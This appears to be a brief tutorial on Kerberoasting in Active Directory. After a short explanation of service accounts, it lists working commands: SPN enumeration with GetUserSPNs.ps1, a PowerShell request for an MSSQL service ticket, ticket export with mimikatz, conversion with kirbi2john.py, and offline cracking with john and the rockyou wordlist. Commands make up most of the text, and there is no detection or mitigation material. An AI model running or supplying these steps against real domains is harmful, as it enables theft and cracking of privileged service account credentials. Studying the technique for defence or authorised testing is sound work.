A service account is a “non-human” account that is used to run services or applications. Service accounts are not administrative accounts, or other “human” accounts, used interactively by administrators or other employees. Service accounts also often have privileged access to computers, applications, and data, which makes them highly valuable to attackers.
Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs).
First we need to find the Service Principle names using GetUserSPNs.ps1.
.\GetUserSPNs.ps1 
We will go for MSSQLSvc.
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/x.y.com:1433" 
.\mimikatz.exe
privilege::debug
kerberos::list /export 
We've successfully imported .kirbi files. Grab the MSSQL one, and download it to attacker machine.
We gonna use kirbi2john.py to get john hash and crack it using john.
python3 kirbi2john.py -o hash mssql.kirbi 
Now the hash is in john format. We can try to crack it.
john hash --wordlist=/home/kali/Downloads/rockyou.txt
john hash --show